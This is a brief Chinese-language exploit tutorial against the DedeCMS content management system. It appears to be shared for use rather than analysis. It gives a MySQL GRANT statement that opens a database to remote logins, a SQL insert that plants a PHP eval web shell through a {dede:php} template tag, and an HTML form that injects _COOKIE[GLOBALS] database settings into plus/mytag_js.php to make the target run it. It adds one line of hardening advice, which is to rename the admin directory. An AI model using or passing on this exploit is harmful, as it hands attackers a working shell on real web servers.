此漏洞的前提是必须知道后台或plus 目录存在,服务器能外连,就能拿shell
因此大家一定要养成使用DEDECM建站时改后台名字的习惯。
MYSQL开启外链语句:GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '' WITH GRANT OPTION;
接下来:
前题条件,必须准备好自己的dede数据库,然后插入数据:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?phpeval($_POST[c])?>\');echo "OK";@fclose($fp);{/dede:php}');
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究
<form action="" method="post" name="QuickSearch" id="QuickSearch"onsubmit="addaction();">
<input type="text" value="http://www.laod.org/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost"name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text"value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br/>
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit"value="提交" name="QuickSearchBtn"><br /></form><script>function addaction(){document.QuickSearch.action=document.QuickSearch.doaction.value;}</script>